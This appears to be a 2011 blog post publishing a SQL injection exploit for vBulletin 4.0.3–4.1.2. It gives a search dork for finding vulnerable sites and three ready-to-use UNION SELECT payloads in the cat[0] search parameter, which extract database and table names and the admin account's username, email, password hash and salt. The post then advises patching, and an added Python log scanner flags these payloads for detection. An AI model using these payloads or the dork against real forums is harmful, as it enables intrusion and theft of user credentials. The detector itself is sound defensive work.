Saturday, June 11, 2011

Exploit works on vBulletin versions 4.0.3 -> 4.1.2

Download the Firefox add-on: Live HTTP Headers
Note: you need to search for a keyword that actually returns visible results.

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thanks to my friends from Inj3ct0r Team (1337day.com)

--------------------------
# ~Advice~ #
--------------------------
The vendor has already released a patch in vBulletin 4.1.3.
UPDATE NOW!

Use an HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc
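
Added example (not part of the original advisory and not vBulletin code): a Python check for web server or WAF logs that flags POST bodies whose cat[...] parameter, the one the payloads above abuse, carries anything other than an integer. It assumes category ids are unsigned integers and that request bodies are available as urlencoded strings; the record layout, the "query" field and the IP addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate cat[...] values are unsigned integer category ids.
CAT_KEY = re.compile(r"cat\[[^\]]*\]")
UNSIGNED_INT = re.compile(r"[0-9]+")


def suspicious_cat_params(post_body):
    """Return (key, value) pairs whose cat[...] value is not a plain integer."""
    hits = []
    # parse_qsl percent-decodes keys and values, so cat%5B0%5D is seen as cat[0].
    for key, value in parse_qsl(post_body):
        if CAT_KEY.fullmatch(key) and not UNSIGNED_INT.fullmatch(value.strip()):
            hits.append((key, value))
    return hits


def scan(records):
    """Return (client, path, key, value) for every suspicious cat[...] parameter."""
    alerts = []
    for rec in records:
        for key, value in suspicious_cat_params(rec["body"]):
            alerts.append((rec["client"], rec["path"], key, value))
    return alerts


# Constructed sample records (documentation IP ranges, not real traffic).
SAMPLE_RECORDS = [
    {"client": "192.0.2.10", "path": "/search.php?search_type=1",
     "body": "query=test&cat%5B0%5D=1&cat%5B1%5D=12"},
    {"client": "198.51.100.7", "path": "/search.php?search_type=1",
     "body": "query=test&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23"},
    {"client": "198.51.100.7", "path": "/search.php?search_type=1",
     "body": "query=test&cat[0]=1) UNION SELECT table_name "
             "FROM information_schema.tables#"},
]

if __name__ == "__main__":
    for client, path, key, value in scan(SAMPLE_RECORDS):
        print(f"ALERT {client} {path} {key}={value!r}")
```

The same integer-only rule works as a virtual patch in front of unpatched installs until 4.1.3 is deployed.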

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936
